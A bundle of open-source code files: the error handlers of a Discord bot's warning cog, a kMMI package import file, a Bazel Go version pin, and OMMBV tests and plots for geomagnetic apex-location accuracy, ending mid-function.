if isinstance(error, commands.MissingRequiredArgument):
msg1 = await ctx.send('<:stop:587970807909842944> Missing required argument!')
await msg1.delete(delay=5)
if isinstance(error, commands.MissingRole):
msg = await ctx.send('<:stop:587970807909842944> Oops! You cannot use that command!')
await msg.delete(delay=5)
if isinstance(error, commands.BadArgument):
msg2 = await ctx.send(
'<:stop:587970807909842944> Something is wrong, try again!')
await msg2.delete(delay=5)
if isinstance(error, commands.CommandInvokeError):
msg4 = await ctx.send(
'<:stop:587970807909842944> Something is wrong, try again!')
await msg4.delete(delay=5)
if isinstance(error, commands.CommandOnCooldown):
msg9 = 'This command is rate limited, please try again in {:.2f} seconds'.format(error.retry_after)
msg6 = await ctx.send(msg9)
await msg6.delete(delay=5)
if isinstance(error, commands.MissingPermissions):
msg1 = await ctx.send('<:stop:587970807909842944> Missing permission!')
await msg1.delete(delay=5)
@dewarn.error
async def _dewarn(self, ctx, error):
if isinstance(error, commands.MissingRequiredArgument):
msg1 = await ctx.send('<:stop:587970807909842944> Missing required argument!')
await msg1.delete(delay=5)
if isinstance(error, commands.MissingRole):
msg = await ctx.send('<:stop:587970807909842944> Oops! You cannot use that command!')
await msg.delete(delay=5)
if isinstance(error, commands.BadArgument):
msg2 = await ctx.send(
'<:stop:587970807909842944> Something is wrong, try again!')
await msg2.delete(delay=5)
if isinstance(error, commands.CommandOnCooldown):
msg9 = 'This command is rate limited, please try again in {:.2f} seconds'.format(error.retry_after)
msg6 = await ctx.send(msg9)
await msg6.delete(delay=5)
if isinstance(error, commands.MissingPermissions):
msg1 = await ctx.send('<:stop:587970807909842944> Missing permission!')
await msg1.delete(delay=5)
@warnings.error
async def _warnings(self, ctx, error):
if isinstance(error, commands.MissingRequiredArgument):
msg1 = await ctx.send('<:stop:587970807909842944> Missing required argument!')
await msg1.delete(delay=5)
if isinstance(error, commands.MissingRole):
msg = await ctx.send('<:stop:587970807909842944> Oops! You cannot use that command!')
await msg.delete(delay=5)
if isinstance(error, commands.BadArgument):
msg2 = await ctx.send(
'<:stop:587970807909842944> Something is wrong, try again!')
await msg2.delete(delay=5)
if isinstance(error, commands.CommandOnCooldown):
msg9 = 'This command is rate limited, please try again in {:.2f} seconds'.format(error.retry_after)
msg6 = await ctx.send(msg9)
await msg6.delete(delay=5)
if isinstance(error, commands.MissingPermissions):
msg1 = await ctx.send('<:stop:587970807909842944> Missing permission!')
await msg1.delete(delay=5)
def setup(bot):
bot.add_cog(Warninggsystem(bot))
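The warn/dewarn commands above hinge on counting a member's stored warning records (`db1.search(Warn.member_id == member.id)`) and escalating to a temporary ban once two prior warnings exist, clearing the records afterwards. A minimal stdlib-only sketch of that counting logic — the in-memory `WarnStore` below is a hypothetical stand-in for the TinyDB table, not part of the cog:

```python
class WarnStore:
    """In-memory stand-in for the TinyDB warn table used by the cog."""

    def __init__(self):
        self.records = []

    def warn(self, member_id, reason):
        """Record a warning; escalate to 'ban' once the third warning lands."""
        prior = [r for r in self.records if r['member_id'] == member_id]
        if len(prior) > 1:  # two prior warnings -> this one is the third
            # mirror db1.remove(Warn.member_id == member.id) after the temp ban
            self.records = [r for r in self.records if r['member_id'] != member_id]
            return 'ban'
        self.records.append({'member_id': member_id, 'reason': reason})
        return 'warn'

    def count(self, member_id):
        """Mirror len(db1.search(Warn.member_id == member_id))."""
        return sum(1 for r in self.records if r['member_id'] == member_id)


store = WarnStore()
outcomes = [store.warn(42, 'spam') for _ in range(3)]
```

Note the asymmetry carried over from the cog: warnings accumulate per member, but the ban branch wipes the whole record set for that member rather than decrementing it.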
# --- kmmi/heuristics/__init__.py (Decitizen/kMMI, MIT) ---
from kmmi.heuristics.initialize import *
from kmmi.heuristics.neighborhood_search import *
from kmmi.heuristics.neighborhood_change import *
from kmmi.heuristics.utils import *
from kmmi.heuristics.bvns import *
from kmmi.heuristics.ovns import *
from kmmi.heuristics.ovns_fs import *
# --- third_party/golang/revision.bzl (EdSchouten/bazel-toolchains, Apache-2.0) ---
GOLANG_REVISION = "1.11.1"
GOLANG_SHA256 = "2871270d8ff0c8c69f161aaae42f9f28739855ff5c5204752a8d92a1c9f63993"
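The pinned `GOLANG_SHA256` above is the digest a downloader would check the fetched Go archive against before using it. A minimal sketch of that verification step — the `verify_sha256` helper and the sample payload are illustrative, not part of the .bzl file:

```python
import hashlib


def verify_sha256(data: bytes, expected_hex: str) -> bool:
    """Return True when the payload's SHA-256 digest matches the pinned value."""
    return hashlib.sha256(data).hexdigest() == expected_hex


# In practice `payload` would be the downloaded go1.11.1 archive bytes.
payload = b"example archive bytes"
digest = hashlib.sha256(payload).hexdigest()
```

Pinning both a revision and its digest means a tampered or re-uploaded archive fails the check even if it keeps the same version string.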
# --- OMMBV/tests/test_apex.py (jklenzing/pysatMagVect, BSD-3-Clause) ---
import datetime
import numpy as np
import matplotlib.pyplot as plt
import pandas as pds
import OMMBV
import pysat
from OMMBV.tests.test_core import gen_data_fixed_alt, gen_trace_data_fixed_alt
from OMMBV.tests.test_core import gen_plot_grid_fixed_alt
from OMMBV.tests.test_core import dview, dc
class TestMaxApexHeight():
def test_plot_apex_heights(self):
"""Check meridional vector along max in apex height gradient"""
date = pysat.datetime(2010, 1, 1)
delta = 1.
ecef_x, ecef_y, ecef_z = OMMBV.geodetic_to_ecef([0.], [320.], [550.])
# get basis vectors
zx, zy, zz, _, _, _, mx, my, mz = OMMBV.calculate_mag_drift_unit_vectors_ecef(ecef_x, ecef_y, ecef_z,
[date], ecef_input=True)
# get apex height for step along meridional directions, then around that direction
_, _, _, _, _, nominal_max = OMMBV.apex_location_info(ecef_x + delta * mx,
ecef_y + delta * my,
ecef_z + delta * mz,
[date],
ecef_input=True,
return_geodetic=True)
steps = (np.arange(101) - 50.) * delta / 10000.
output_max = []
for step in steps:
del_x = delta * mx + step * zx
del_y = delta * my + step * zy
del_z = delta * mz + step * zz
norm = np.sqrt(del_x ** 2 + del_y ** 2 + del_z ** 2)
del_x /= norm
del_y /= norm
del_z /= norm
_, _, _, _, _, loop_h = OMMBV.apex_location_info(ecef_x + del_x,
ecef_y + del_y,
ecef_z + del_z,
[date],
ecef_input=True,
return_geodetic=True)
output_max.append(loop_h)
try:
plt.figure()
plt.plot(steps, output_max)
plt.plot([0], nominal_max, color='r', marker='o', markersize=12)
plt.ylabel('Apex Height (km)')
plt.xlabel('Distance along Zonal Direction (km)')
plt.savefig('comparison_apex_heights_and_meridional.pdf')
plt.close()
except Exception:
pass
# make sure meridional direction is correct
assert np.all(np.max(output_max) == nominal_max)
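The step loop above perturbs the meridional step by a zonal component and renormalizes the offset to unit length before re-tracing the apex. That renormalization, isolated as a sketch mirroring the `del_x/del_y/del_z` arithmetic (the `unit_step` helper is illustrative, not part of OMMBV):

```python
import math


def unit_step(mx, my, mz, zx, zy, zz, delta, step):
    """Combine a meridional step with a zonal perturbation, scaled to unit length."""
    dx = delta * mx + step * zx
    dy = delta * my + step * zy
    dz = delta * mz + step * zz
    norm = math.sqrt(dx ** 2 + dy ** 2 + dz ** 2)
    return dx / norm, dy / norm, dz / norm


# Pure meridional basis along x, zonal along y: a half-step zonal tilt.
ux, uy, uz = unit_step(1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 1.0, 0.5)
```

Keeping every perturbed offset at unit length is what makes the apex heights comparable across steps: only the direction of the displacement varies, not its magnitude.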
class TestApex():
def __init__(self):
# placeholder for data management features
self.inst = pysat.Instrument('pysat', 'testing')
self.inst.yr = 2010.
self.inst.doy = 1.
self.dview = dview
self.dc = dc
return
def test_apex_info_accuracy(self):
"""Characterize performance of apex_location_info as fine_step_size varied"""
lats, longs, alts = gen_trace_data_fixed_alt(550.)
ecf_x, ecf_y, ecf_z = OMMBV.geodetic_to_ecef(lats,
longs,
alts)
# step size to be tried
fine_steps_goal = np.array([25.6, 12.8, 6.4, 3.2, 1.6, 0.8, 0.4, 0.2,
0.1, 0.05, .025, .0125, .00625, .003125,
.0015625, .00078125, .000390625, .0001953125,
.0001953125 / 2., .0001953125 / 4., .0001953125 / 8.,
.0001953125 / 16., .0001953125 / 32., .0001953125 / 64.,
.0001953125 / 128., .0001953125 / 256., .0001953125 / 512.,
.0001953125 / 1024., .0001953125 / 2048., .0001953125 / 4096.])
date = datetime.datetime(2000, 1, 1)
dx = []
dy = []
dz = []
dh = []
# set up multi
if self.dc is not None:
import itertools
targets = itertools.cycle(dc.ids)
pending = []
for lat, lon, alt in zip(lats, longs, alts):
for steps in fine_steps_goal:
# iterate through target cyclicly and run commands
dview.targets = next(targets)
pending.append(dview.apply_async(OMMBV.apex_location_info, [lat],
[lon], [alt], [date], fine_step_size=steps,
return_geodetic=True))
out = []
for steps in fine_steps_goal:
# collect output
x, y, z, _, _, apex_height = pending.pop(0).get()
pt = [x[0], y[0], z[0], apex_height[0]]
out.append(pt)
final_pt = pds.DataFrame(out, columns=['x', 'y', 'z', 'h'])
dx.append(np.abs(final_pt.loc[1:, 'x'].values - final_pt.loc[:, 'x'].values[:-1]))
dy.append(np.abs(final_pt.loc[1:, 'y'].values - final_pt.loc[:, 'y'].values[:-1]))
dz.append(np.abs(final_pt.loc[1:, 'z'].values - final_pt.loc[:, 'z'].values[:-1]))
dh.append(np.abs(final_pt.loc[1:, 'h'].values - final_pt.loc[:, 'h'].values[:-1]))
else:
for lat, lon, alt in zip(lats, longs, alts):
out = []
for steps in fine_steps_goal:
x, y, z, _, _, apex_height = OMMBV.apex_location_info([lat], [lon], [alt], [date],
fine_step_size=steps,
return_geodetic=True)
pt = [x[0], y[0], z[0], apex_height[0]]
out.append(pt)
final_pt = pds.DataFrame(out, columns=['x', 'y', 'z', 'h'])
dx.append(np.abs(final_pt.loc[1:, 'x'].values - final_pt.loc[:, 'x'].values[:-1]))
dy.append(np.abs(final_pt.loc[1:, 'y'].values - final_pt.loc[:, 'y'].values[:-1]))
dz.append(np.abs(final_pt.loc[1:, 'z'].values - final_pt.loc[:, 'z'].values[:-1]))
dh.append(np.abs(final_pt.loc[1:, 'h'].values - final_pt.loc[:, 'h'].values[:-1]))
dx = pds.DataFrame(dx)
dy = pds.DataFrame(dy)
dz = pds.DataFrame(dz)
dh = pds.DataFrame(dh)
try:
plt.figure()
yerrx = np.nanstd(np.log10(dx), axis=0)
yerry = np.nanstd(np.log10(dy), axis=0)
yerrz = np.nanstd(np.log10(dz), axis=0)
yerrh = np.nanstd(np.log10(dh), axis=0)
plt.errorbar(np.log10(fine_steps_goal[1:]), np.log10(dx.mean(axis=0)),
yerr=yerrx,
label='x')
plt.errorbar(np.log10(fine_steps_goal[1:]), np.log10(dy.mean(axis=0)),
yerr=yerry,
label='y')
plt.errorbar(np.log10(fine_steps_goal[1:]), np.log10(dz.mean(axis=0)),
yerr=yerrz,
label='z')
plt.errorbar(np.log10(fine_steps_goal[1:]), np.log10(dh.mean(axis=0)),
yerr=yerrh,
label='h')
plt.xlabel('Log Step Size (km)')
plt.ylabel('Change in Apex Position (km)')
plt.title("Change in Field Apex Position vs Fine Step Size")
plt.legend()
plt.tight_layout()
plt.savefig('apex_location_vs_step_size.pdf')
plt.close()
except Exception:
pass
def test_apex_plots(self):
"""Plot basic apex parameters"""
import matplotlib.pyplot as plt
p_lats, p_longs, p_alts = gen_plot_grid_fixed_alt(120.)
# data returned are the locations along each direction
# the full range of points obtained by iterating over all
# recasting alts into a more convenient form for later calculation
p_alts = [p_alts[0]] * len(p_longs)
# set the date
date = datetime.datetime(2000, 1, 1)
# memory for results
apex_lat = np.zeros((len(p_lats), len(p_longs) + 1))
apex_lon = np.zeros((len(p_lats), len(p_longs) + 1))
apex_alt = np.zeros((len(p_lats), len(p_longs) + 1))
# set up multi
if self.dc is not None:
import itertools
targets = itertools.cycle(dc.ids)
pending = []
for i, p_lat in enumerate(p_lats):
print(i, p_lat)
# iterate through target cyclicly and run commands
dview.targets = next(targets)
pending.append(dview.apply_async(OMMBV.apex_location_info, [p_lat] * len(p_longs), p_longs,
p_alts, [date] * len(p_longs),
return_geodetic=True))
for i, p_lat in enumerate(p_lats):
print('collecting ', i, p_lat)
# collect output
x, y, z, olat, olon, oalt = pending.pop(0).get()
apex_lat[i, :-1] = olat
apex_lon[i, :-1] = olon
apex_alt[i, :-1] = oalt
else:
# single processor case
for i, p_lat in enumerate(p_lats):
print(i, p_lat)
x, y, z, olat, olon, oalt = OMMBV.apex_location_info([p_lat] * len(p_longs), p_longs,
p_alts, [date] * len(p_longs),
return_geodetic=True)
apex_lat[i, :-1] = olat
apex_lon[i, :-1] = olon
apex_alt[i, :-1] = oalt
# calculate difference between apex longitude and original longitude
# values for apex long are -180 to 180, shift to 0 to 360
# process degrees a bit to make the degree difference the most meaningful (close to 0)
idx, idy, = np.where(apex_lon < 0.)
apex_lon[idx, idy] += 360.
idx, idy, = np.where(apex_lon >= 360.)
apex_lon[idx, idy] -= 360.
apex_lon[:, :-1] -= p_longs
idx, idy, = np.where(apex_lon > 180.)
apex_lon[idx, idy] -= 360.
idx, idy, = np.where(apex_lon <= -180.)
apex_lon[idx, idy] += 360.
# account for periodicity
apex_lat[:, -1] = apex_lat[:, 0]
apex_lon[:, -1] = apex_lon[:, 0]
apex_alt[:, -1] = apex_alt[:, 0]
ytickarr = np.array([0, 0.25, 0.5, 0.75, 1]) * (len(p_lats) - 1)
xtickarr = np.array([0, 0.2, 0.4, 0.6, 0.8, 1]) * len(p_longs)
ytickvals = ['-25', '-12.5', '0', '12.5', '25']
try:
fig = plt.figure()
plt.imshow(apex_lat, origin='lower')
plt.colorbar()
plt.yticks(ytickarr, ytickvals)
plt.xticks(xtickarr, ['0', '72', '144', '216', '288', '360'])
plt.title('Apex Latitude (Degrees) at 120 km')
plt.xlabel('Geodetic Longitude (Degrees)')
plt.ylabel('Geodetic Latitude (Degrees)')
plt.savefig('apex_lat.pdf')
plt.close()
fig = plt.figure()
plt.imshow(apex_lon, origin='lower')
plt.colorbar()
plt.yticks(ytickarr, ytickvals)
plt.xticks(xtickarr, ['0', '72', '144', '216', '288', '360'])
plt.title('Apex Longitude Difference (Degrees) at 120 km')
plt.xlabel('Geodetic Longitude (Degrees)')
plt.ylabel('Geodetic Latitude (Degrees)')
plt.savefig('apex_lon.pdf')
plt.close()
fig = plt.figure()
plt.imshow(np.log10(apex_alt), origin='lower')
plt.colorbar()
plt.yticks(ytickarr, ytickvals)
plt.xticks(xtickarr, ['0', '72', '144', '216', '288', '360'])
plt.title('Log Apex Altitude (km) at 120 km')
plt.xlabel('Geodetic Longitude (Degrees)')
plt.ylabel('Geodetic Latitude (Degrees)')
plt.savefig('apex_alt.pdf')
plt.close()
except Exception:
pass
def test_apex_diff_plots(self):
"""Uncertainty of apex location determination at default fine_step_size"""
import matplotlib.pyplot as plt
# on_travis = os.environ.get('ONTRAVIS') == 'True'
p_lats, p_longs, p_alts = gen_plot_grid_fixed_alt(550.)
# data returned are the locations along each direction
# the full range of points obtained by iterating over all
# recasting alts into a more convenient form for later calculation
p_alts = [p_alts[0]] * len(p_longs)
# set the date
date = datetime.datetime(2000, 1, 1)
# memory for results
apex_lat = np.zeros((len(p_lats), len(p_longs) + 1))
apex_lon = np.zeros((len(p_lats), len(p_longs) + 1))
apex_alt = np.zeros((len(p_lats), len(p_longs) + 1))
apex_z = np.zeros((len(p_lats), len(p_longs) + 1))
norm_alt = np.zeros((len(p_lats), len(p_longs) + 1))
# set up multi
if self.dc is not None:
import itertools
targets = itertools.cycle(dc.ids)
pending = []
for i, p_lat in enumerate(p_lats):
print(i, p_lat)
# iterate through target cyclicly and run commands
dview.targets = next(targets)
pending.append(dview.apply_async(OMMBV.apex_location_info, [p_lat] * len(p_longs), p_longs,
p_alts, [date] * len(p_longs),
fine_step_size=1.E-5,
return_geodetic=True))
pending.append(dview.apply_async(OMMBV.apex_location_info, [p_lat] * len(p_longs), p_longs,
p_alts, [date] * len(p_longs),
fine_step_size=5.E-6,
return_geodetic=True))
for i, p_lat in enumerate(p_lats):
print('collecting ', i, p_lat)
# collect output
x, y, z, _, _, h = pending.pop(0).get()
x2, y2, z2, _, _, h2 = pending.pop(0).get()
apex_lat[i, :-1] = np.abs(x2 - x)
apex_lon[i, :-1] = np.abs(y2 - y)
apex_z[i, :-1] = np.abs(z2 - z)
apex_alt[i, :-1] = np.abs(h2 - h)
else:
# single processor case
for i, p_lat in enumerate(p_lats):
print(i, p_lat)
x, y, z, _, _, h = OMMBV.apex_location_info([p_lat] * len(p_longs), p_longs,
p_alts, [date] * len(p_longs),
fine_step_size=1.E-5, return_geodetic=True)
x2, y2, z2, _, _, h2 = OMMBV.apex_location_info([p_lat] * len(p_longs), p_longs,
p_alts, [date] * len(p_longs),
fine_step_size=5.E-6, return_geodetic=True)
norm_alt[i, :-1] = h
apex_lat[i, :-1] = np.abs(x2 - x)
apex_lon[i, :-1] = np.abs(y2 - y)
apex_z[i, :-1] = np.abs(z2 - z)
apex_alt[i, :-1] = np.abs(h2 - h)
# account for periodicity
apex_lat[:, -1] = apex_lat[:, 0]
apex_lon[:, -1] = apex_lon[:, 0]
apex_z[:, -1] = apex_z[:, 0]
apex_alt[:, -1] = apex_alt[:, 0]
norm_alt[:, -1] = norm_alt[:, 0]
idx, idy, = np.where(apex_lat > 10.)
print('Locations with large apex x (ECEF) location differences.', p_lats[idx], p_longs[idx])
ytickarr = np.array([0, 0.25, 0.5, 0.75, 1]) * (len(p_lats) - 1)
xtickarr = np.array([0, 0.2, 0.4, 0.6, 0.8, 1]) * len(p_longs)
ytickvals = ['-50', '-25', '0', '25', '50']
try:
fig = plt.figure()
plt.imshow(np.log10(apex_lat), origin='lower')
plt.colorbar()
plt.yticks(ytickarr, ytickvals)
plt.xticks(xtickarr, ['0', '72', '144', '216', '288', '360'])
plt.title('Log Apex Location Difference (ECEF-x km)')
plt.xlabel('Geodetic Longitude (Degrees)')
plt.ylabel('Geodetic Latitude (Degrees)')
plt.savefig('apex_loc_diff_x.pdf')
plt.close()
fig = plt.figure()
plt.imshow(np.log10(apex_lon), origin='lower')
plt.colorbar()
plt.yticks(ytickarr, ytickvals)
plt.xticks(xtickarr, ['0', '72', '144', '216', '288', '360'])
plt.title('Log Apex Location Difference (ECEF-y km)')
plt.xlabel('Geodetic Longitude (Degrees)')
plt.ylabel('Geodetic Latitude (Degrees)')
plt.savefig('apex_loc_diff_y.pdf')
plt.close()
fig = plt.figure()
plt.imshow(np.log10(apex_z), origin='lower')
plt.colorbar()
plt.yticks(ytickarr, ytickvals)
plt.xticks(xtickarr, ['0', '72', '144', '216', '288', '360'])
plt.title('Log Apex Location Difference (ECEF-z km)')
plt.xlabel('Geodetic Longitude (Degrees)')
plt.ylabel('Geodetic Latitude (Degrees)')
plt.savefig('apex_loc_diff_z.pdf')
plt.close()
fig = plt.figure()
plt.imshow(np.log10(apex_alt / norm_alt), origin='lower')
plt.colorbar()
plt.yticks(ytickarr, ytickvals)
plt.xticks(xtickarr, ['0', '72', '144', '216', '288', '360'])
plt.title('Log Apex Altitude Normalized Difference (km)')
plt.xlabel('Geodetic Longitude (Degrees)')
plt.ylabel('Geodetic Latitude (Degrees)')
plt.savefig('apex_norm_loc_diff_h.pdf')
plt.close()
fig = plt.figure()
plt.imshow(np.log10(apex_alt), origin='lower')
plt.colorbar()
plt.yticks(ytickarr, ytickvals)
plt.xticks(xtickarr, ['0', '72', '144', '216', '288', '360'])
plt.title('Log Apex Altitude Difference (km)')
plt.xlabel('Geodetic Longitude (Degrees)')
plt.ylabel('Geodetic Latitude (Degrees)')
plt.savefig('apex_loc_diff_h.pdf')
plt.close()
except Exception:
pass
def test_apex_fine_max_step_diff_plots(self):
"""Test apex location info for sensitivity to fine_steps parameters"""
import matplotlib.pyplot as plt
# on_travis = os.environ.get('ONTRAVIS') == 'True'
p_lats, p_longs, p_alts = gen_plot_grid_fixed_alt(550.)
# data returned are the locations along each direction
# the full range of points obtained by iterating over all
# recasting alts into a more convenient form for later calculation
p_alts = [p_alts[0]] * len(p_longs)
# set the date
date = datetime.datetime(2000, 1, 1)
# memory for results
apex_lat = np.zeros((len(p_lats), len(p_longs) + 1))
apex_lon = np.zeros((len(p_lats), len(p_longs) + 1))
apex_alt = np.zeros((len(p_lats), len(p_longs) + 1))
apex_z = np.zeros((len(p_lats), len(p_longs) + 1))
norm_alt = np.zeros((len(p_lats), len(p_longs) + 1))
# set up multi
if self.dc is not None:
import itertools
targets = itertools.cycle(dc.ids)
pending = []
for i, p_lat in enumerate(p_lats):
print(i, p_lat)
# iterate through target cyclicly and run commands
dview.targets = next(targets)
pending.append(dview.apply_async(OMMBV.apex_location_info, [p_lat] * len(p_longs), p_longs,
p_alts, [date] * len(p_longs),
fine_max_steps=5,
return_geodetic=True))
pending.append(dview.apply_async(OMMBV.apex_location_info, [p_lat] * len(p_longs), p_longs,
p_alts, [date] * len(p_longs),
fine_max_steps=10,
return_geodetic=True))
for i, p_lat in enumerate(p_lats):
print('collecting ', i, p_lat)
# collect output
x, y, z, _, _, h = pending.pop(0).get()
x2, y2, z2, _, _, h2 = pending.pop(0).get()
apex_lat[i, :-1] = np.abs(x2 - x)
apex_lon[i, :-1] = np.abs(y2 - y)
apex_z[i, :-1] = np.abs(z2 - z)
apex_alt[i, :-1] = np.abs(h2 - h)
else:
# single processor case
for i, p_lat in enumerate(p_lats):
print(i, p_lat)
x, y, z, _, _, h = OMMBV.apex_location_info([p_lat] * len(p_longs), p_longs,
p_alts, [date] * len(p_longs),
fine_max_steps=5, return_geodetic=True)
x2, y2, z2, _, _, h2 = OMMBV.apex_location_info([p_lat] * len(p_longs), p_longs,
p_alts, [date] * len(p_longs),
fine_max_steps=10, return_geodetic=True)
norm_alt[i, :-1] = h
apex_lat[i, :-1] = np.abs(x2 - x)
apex_lon[i, :-1] = np.abs(y2 - y)
apex_z[i, :-1] = np.abs(z2 - z)
apex_alt[i, :-1] = np.abs(h2 - h)
# account for periodicity
apex_lat[:, -1] = apex_lat[:, 0]
apex_lon[:, -1] = apex_lon[:, 0]
apex_z[:, -1] = apex_z[:, 0]
apex_alt[:, -1] = apex_alt[:, 0]
norm_alt[:, -1] = norm_alt[:, 0]
idx, idy, = np.where(apex_lat > 10.)
print('Locations with large apex x (ECEF) location differences.', p_lats[idx], p_longs[idx])
ytickarr = np.array([0, 0.25, 0.5, 0.75, 1]) * (len(p_lats) - 1)
xtickarr = np.array([0, 0.2, 0.4, 0.6, 0.8, 1]) * len(p_longs)
ytickvals = ['-50', '-25', '0', '25', '50']
try:
fig = plt.figure()
plt.imshow(np.log10(apex_lat), origin='lower')
plt.colorbar()
plt.yticks(ytickarr, ytickvals)
plt.xticks(xtickarr, ['0', '72', '144', '216', '288', '360'])
plt.title('Log Apex Location Difference (ECEF-x km)')
plt.xlabel('Geodetic Longitude (Degrees)')
plt.ylabel('Geodetic Latitude (Degrees)')
plt.savefig('apex_loc_max_steps_diff_x.pdf')
plt.close()
fig = plt.figure()
plt.imshow(np.log10(apex_lon), origin='lower')
plt.colorbar()
plt.yticks(ytickarr, ytickvals)
plt.xticks(xtickarr, ['0', '72', '144', '216', '288', '360'])
plt.title('Log Apex Location Difference (ECEF-y km)')
plt.xlabel('Geodetic Longitude (Degrees)')
plt.ylabel('Geodetic Latitude (Degrees)')
plt.savefig('apex_loc_max_steps_diff_y.pdf')
plt.close()
fig = plt.figure()
plt.imshow(np.log10(apex_z), origin='lower')
plt.colorbar()
plt.yticks(ytickarr, ytickvals)
plt.xticks(xtickarr, ['0', '72', '144', '216', '288', '360'])
plt.title('Log Apex Location Difference (ECEF-z km)')
plt.xlabel('Geodetic Longitude (Degrees)')
plt.ylabel('Geodetic Latitude (Degrees)')
plt.savefig('apex_loc_max_steps_diff_z.pdf')
plt.close()
fig = plt.figure()
plt.imshow(np.log10(apex_alt / norm_alt), origin='lower')
plt.colorbar()
plt.yticks(ytickarr, ytickvals)
plt.xticks(xtickarr, ['0', '72', '144', '216', '288', '360'])
plt.title('Log Apex Altitude Normalized Difference (km)')
plt.xlabel('Geodetic Longitude (Degrees)')
plt.ylabel('Geodetic Latitude (Degrees)')
plt.savefig('apex_norm_loc_max_steps_diff_h.pdf')
plt.close()
fig = plt.figure()
plt.imshow(np.log10(apex_alt), origin='lower')
plt.colorbar()
plt.yticks(ytickarr, ytickvals)
plt.xticks(xtickarr, ['0', '72', '144', '216', '288', '360'])
plt.title('Log Apex Altitude Normalized Difference (km)')
plt.xlabel('Geodetic Longitude (Degrees)')
plt.ylabel('Geodetic Latitude (Degrees)')
plt.savefig('apex_loc_max_steps_diff_h.pdf')
plt.close()
except:
pass
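The periodic-wrap bookkeeping used above (arrays get one extra final column, and column 0 is copied into it so the plots span the full 0-360 degrees of longitude) can be sketched in isolation. The names here are illustrative, not taken from OMMBV:

```python
import numpy as np

# five sample longitudes covering 0-360 exclusive, matching the tick labels
p_longs = np.arange(0, 360, 72)
vals = np.sin(np.deg2rad(p_longs))      # stand-in for a computed quantity

# allocate one extra slot and duplicate column 0 into it:
# longitude 360 degrees is the same physical location as 0 degrees
wrapped = np.zeros(len(p_longs) + 1)
wrapped[:-1] = vals
wrapped[-1] = wrapped[0]
```

Without the duplicated column, an `imshow` of the grid would visually end at the last sample (288 degrees) instead of closing the circle at 360.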
    def test_ecef_geodetic_apex_diff_plots(self):
        """Characterize the uncertainty of ECEF and geodetic transformations"""
        import matplotlib.pyplot as plt
        # on_travis = os.environ.get('ONTRAVIS') == 'True'

        p_lats, p_longs, p_alts = gen_plot_grid_fixed_alt(550.)
        # data returned are the locations along each direction
        # the full range of points obtained by iterating over all
        # recasting alts into a more convenient form for later calculation
        p_alts = [p_alts[0]] * len(p_longs)
        # set the date
        date = datetime.datetime(2000, 1, 1)
        # memory for results
        apex_x = np.zeros((len(p_lats), len(p_longs) + 1))
        apex_y = np.zeros((len(p_lats), len(p_longs) + 1))
        apex_z = np.zeros((len(p_lats), len(p_longs) + 1))
        apex_alt = np.zeros((len(p_lats), len(p_longs) + 1))
        norm_alt = np.zeros((len(p_lats), len(p_longs) + 1))

        # set up multiprocessing
        if self.dc is not None:
            import itertools
            targets = itertools.cycle(self.dc.ids)
            pending = []
            for i, p_lat in enumerate(p_lats):
                print(i, p_lat)
                # iterate through targets cyclically and run commands
                dview.targets = next(targets)
                pending.append(dview.apply_async(OMMBV.geodetic_to_ecef, np.array([p_lat] * len(p_longs)),
                                                 p_longs, p_alts))
            for i, p_lat in enumerate(p_lats):
                print('collecting ', i, p_lat)
                # collect output
                x, y, z = pending.pop(0).get()
                # iterate through targets cyclically and run commands
                dview.targets = next(targets)
                pending.append(dview.apply_async(OMMBV.python_ecef_to_geodetic, x, y, z))
            for i, p_lat in enumerate(p_lats):
                print('collecting 2', i, p_lat)
                # collect output
                lat2, lon2, alt2 = pending.pop(0).get()
                # iterate through targets cyclically and run commands
                dview.targets = next(targets)
                pending.append(dview.apply_async(OMMBV.apex_location_info, np.array([p_lat] * len(p_longs)),
                                                 p_longs, p_alts, [date] * len(p_longs),
                                                 return_geodetic=True))
                pending.append(dview.apply_async(OMMBV.apex_location_info, lat2, lon2, alt2,
                                                 [date] * len(p_longs),
                                                 return_geodetic=True))
            for i, p_lat in enumerate(p_lats):
                print('collecting 3', i, p_lat)
                x, y, z, _, _, h = pending.pop(0).get()
                x2, y2, z2, _, _, h2 = pending.pop(0).get()
                norm_alt[i, :-1] = np.abs(h)
                apex_x[i, :-1] = np.abs(x2 - x)
                apex_y[i, :-1] = np.abs(y2 - y)
                apex_z[i, :-1] = np.abs(z2 - z)
                apex_alt[i, :-1] = np.abs(h2 - h)
        else:
            # single processor case
            for i, p_lat in enumerate(p_lats):
                print(i, p_lat)
                x, y, z = OMMBV.geodetic_to_ecef([p_lat] * len(p_longs), p_longs, p_alts)
                lat2, lon2, alt2 = OMMBV.ecef_to_geodetic(x, y, z)
                x2, y2, z2 = OMMBV.geodetic_to_ecef(lat2, lon2, alt2)
                apex_x[i, :-1] = np.abs(x2 - x)
                apex_y[i, :-1] = np.abs(y2 - y)
                apex_z[i, :-1] = np.abs(z2 - z)

        # account for periodicity
        apex_x[:, -1] = apex_x[:, 0]
        apex_y[:, -1] = apex_y[:, 0]
        apex_z[:, -1] = apex_z[:, 0]
        apex_alt[:, -1] = apex_alt[:, 0]
        norm_alt[:, -1] = norm_alt[:, 0]

        ytickarr = np.array([0, 0.25, 0.5, 0.75, 1]) * (len(p_lats) - 1)
        xtickarr = np.array([0, 0.2, 0.4, 0.6, 0.8, 1]) * len(p_longs)
        ytickvals = ['-50', '-25', '0', '25', '50']

        try:
            fig = plt.figure()
            plt.imshow(np.log10(apex_x), origin='lower')
            plt.colorbar()
            plt.yticks(ytickarr, ytickvals)
            plt.xticks(xtickarr, ['0', '72', '144', '216', '288', '360'])
            plt.title('Log ECEF-Geodetic Apex Difference (ECEF-x km)')
            plt.xlabel('Geodetic Longitude (Degrees)')
            plt.ylabel('Geodetic Latitude (Degrees)')
            plt.savefig('ecef_geodetic_apex_diff_x.pdf')
            plt.close()

            fig = plt.figure()
            plt.imshow(np.log10(apex_y), origin='lower')
            plt.colorbar()
            plt.yticks(ytickarr, ytickvals)
            plt.xticks(xtickarr, ['0', '72', '144', '216', '288', '360'])
            plt.title('Log ECEF-Geodetic Apex Difference (ECEF-y km)')
            plt.xlabel('Geodetic Longitude (Degrees)')
            plt.ylabel('Geodetic Latitude (Degrees)')
            plt.savefig('ecef_geodetic_apex_diff_y.pdf')
            plt.close()

            fig = plt.figure()
            plt.imshow(np.log10(apex_z), origin='lower')
            plt.colorbar()
            plt.yticks(ytickarr, ytickvals)
            plt.xticks(xtickarr, ['0', '72', '144', '216', '288', '360'])
            plt.title('Log ECEF-Geodetic Apex Difference (ECEF-z km)')
            plt.xlabel('Geodetic Longitude (Degrees)')
